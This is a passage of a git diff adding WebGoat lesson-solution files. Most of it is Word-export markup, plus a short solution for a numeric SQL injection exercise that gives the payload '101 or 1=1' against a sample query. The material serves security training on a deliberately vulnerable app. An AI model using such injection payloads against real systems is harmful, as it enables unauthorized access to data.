+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:1;
+	mso-generic-font-family:roman;
+	mso-font-format:other;
+	mso-font-pitch:variable;
+	mso-font-signature:0 0 0 0 0 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-unhide:no;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-unhide:no;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+.MsoPapDefault
+	{mso-style-type:export-only;
+	margin-bottom:10.0pt;
+	line-height:115%;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin-top:0cm;
+	mso-para-margin-right:0cm;
+	mso-para-margin-bottom:10.0pt;
+	mso-para-margin-left:0cm;
+	line-height:115%;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="2050"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to Perform Numeric SQL Injection <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'> 
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
+
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queiries, even if the threat of SQL injection has been prevented in some other manner.<o:p></o:p></span></p>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>
+The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed. 
+
+<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1509" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image002.jpg" v:shapes="Picture_x0020_1509"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The
+application is taking your input and inserting it at the end of a pre-formed
+SQL command.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Compound SQL
+statements can be made by joining multiple tests with keywords like AND and OR.
+Try appending a SQL statement that always resolves to true.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This is the
+query: SELECT * FROM user_data WHERE userid = 101<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>What happens
+if you insert 101 or 1=1?<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1510"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image004.jpg" v:shapes="Picture_x0020_1510"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Numeric SQL Injection<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1511"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image006.jpg" v:shapes="Picture_x0020_1511"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 17 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/filelist.xml
new file mode 100644
index 000000000..ce53b8ce8
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../SqlNumericInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image001.png b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image001.png
new file mode 100644
index 000000000..4876d330e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image002.jpg b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image002.jpg
new file mode 100644
index 000000000..11fa10d47
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image003.png b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image003.png
new file mode 100644
index 000000000..272aa8b2b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image004.jpg b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image004.jpg
new file mode 100644
index 000000000..38109d42f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image005.png b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image005.png
new file mode 100644
index 000000000..f2868eb02
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image006.jpg b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image006.jpg
new file mode 100644
index 000000000..eb31b8e72
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SqlNumericInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/SqlStringInjection.html b/main/project/WebContent/lesson_solutions/SqlStringInjection.html
new file mode 100644
index 000000000..3b57def06
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SqlStringInjection.html
@@ -0,0 +1,715 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/SqlStringInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SqlStringInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>38</o:TotalTime>
+  <o:Created>2007-07-11T11:08:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:32:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>204</o:Words>
+  <o:Characters>1166</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>9</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1368</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/SqlStringInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/SqlStringInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
